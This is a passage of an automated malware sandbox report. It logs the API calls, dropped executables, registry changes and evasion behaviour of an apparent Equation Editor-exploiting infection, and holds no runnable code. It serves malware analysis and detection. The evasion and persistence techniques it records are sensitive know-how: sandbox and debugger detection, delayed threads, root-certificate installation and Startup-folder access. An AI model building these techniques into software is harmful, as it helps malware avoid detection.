Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_0134F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	11_2_0134F98E
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013C1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	11_2_013C1C41

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\negrett.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\negrett.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\negrett.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\negrett.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Users\user\AppData\Roaming\negrett.exe	Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep			graph_5-46719
Source: C:\Users\user\AppData\Local\directory\name.exe	Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep			graph_8-98652

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 9_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,

9_2_004019F0

Source: C:\Users\user\AppData\Local\directory\name.exe

Code function: 8_2_01001199 sldt word ptr [ecx]

8_2_01001199

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 1404	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 8402	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 8861	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 961	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep

Source: C:\Users\user\AppData\Roaming\negrett.exe	API coverage: 6.7 %
Source: C:\Users\user\AppData\Local\directory\name.exe	API coverage: 4.5 %
Source: C:\Users\user\AppData\Local\directory\name.exe	API coverage: 4.4 %

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1376

Thread sleep time: -240000s >= -30000s

Jump to behavior

Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B7DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	5_2_00B7DBBE
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B4C2A2 FindFirstFileExW,	5_2_00B4C2A2
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B868EE FindFirstFileW,FindClose,	5_2_00B868EE
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B8698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	5_2_00B8698F
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_0105DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	8_2_0105DBBE
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_0102C2A2 FindFirstFileExW,	8_2_0102C2A2
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_0106698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	8_2_0106698F
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_010668EE FindFirstFileW,FindClose,	8_2_010668EE
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_0105D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	8_2_0105D076
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_0105D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	8_2_0105D3A9
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_0106979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	8_2_0106979D
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01069642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	8_2_01069642
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01069B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	8_2_01069B2B
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01065C97 FindFirstFileW,FindNextFileW,FindClose,	8_2_01065C97
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_0139DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	11_2_0139DBBE
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_0136C2A2 FindFirstFileExW,	11_2_0136C2A2
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013A698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	11_2_013A698F
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013A68EE FindFirstFileW,FindClose,	11_2_013A68EE
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_0139D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	11_2_0139D076
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_0139D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	11_2_0139D3A9
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013A979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	11_2_013A979D
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013A9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	11_2_013A9642
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013A9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	11_2_013A9B2B
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013A5C97 FindFirstFileW,FindNextFileW,FindClose,	11_2_013A5C97

Source: C:\Users\user\AppData\Roaming\negrett.exe

Code function: 5_2_00B142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

5_2_00B142DE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

API call chain: ExitProcess graph end node

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 9_2_00410C4B _LocaleUpdate::_LocaleUpdate,__fileno,__isleadbyte_l,LdrInitializeThunk,__cftof,_strlen,__malloc_crt,__decode_pointer,__decode_pointer,__decode_pointer,__aulldvrm,_write_multi_char,_write_string,_write_multi_char,__cftof,_write_string,_write_string,_write_multi_char,

9_2_00410C4B

Source: C:\Users\user\AppData\Roaming\negrett.exe

Code function: 5_2_00B8EAA2 BlockInput,

5_2_00B8EAA2

Source: C:\Users\user\AppData\Roaming\negrett.exe

Code function: 5_2_00B42622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

5_2_00B42622

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

9_2_004019F0

Source: C:\Users\user\AppData\Roaming\negrett.exe

Code function: 5_2_00B142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

5_2_00B142DE

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03530715 mov edx, dword ptr fs:[00000030h]	2_2_03530715
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_029F40E8 mov eax, dword ptr fs:[00000030h]	5_3_029F40E8
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B34CE8 mov eax, dword ptr fs:[00000030h]	5_2_00B34CE8
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01014CE8 mov eax, dword ptr fs:[00000030h]	8_2_01014CE8
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_00193580 mov eax, dword ptr fs:[00000030h]	8_2_00193580
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_001935E0 mov eax, dword ptr fs:[00000030h]	8_2_001935E0
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_00191ED0 mov eax, dword ptr fs:[00000030h]	8_2_00191ED0
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_01354CE8 mov eax, dword ptr fs:[00000030h]	11_2_01354CE8
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_005535E0 mov eax, dword ptr fs:[00000030h]	11_2_005535E0
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_00553580 mov eax, dword ptr fs:[00000030h]	11_2_00553580
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_00551ED0 mov eax, dword ptr fs:[00000030h]	11_2_00551ED0

Source: C:\Users\user\AppData\Roaming\negrett.exe

Code function: 5_2_00B70B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

